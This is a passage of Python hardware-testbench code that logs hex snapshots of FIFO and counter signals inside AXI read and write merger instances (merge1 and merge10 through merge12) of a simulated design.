logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge10.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge10.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge10.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge10.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge10.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge10.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge10.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge10.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge10.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge10.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge10.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge10.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge10.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge10.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge10.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge11.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge11.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge11.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge11.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge11.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge11.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge11.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge11.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge11.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge11.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge11.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge11.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge11.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge11.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge11.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge12.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge12.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge12.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge12.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge12.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge12.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge12.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge12.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge12.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge12.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge12.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge12.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.c_b_fifo.next_count"))
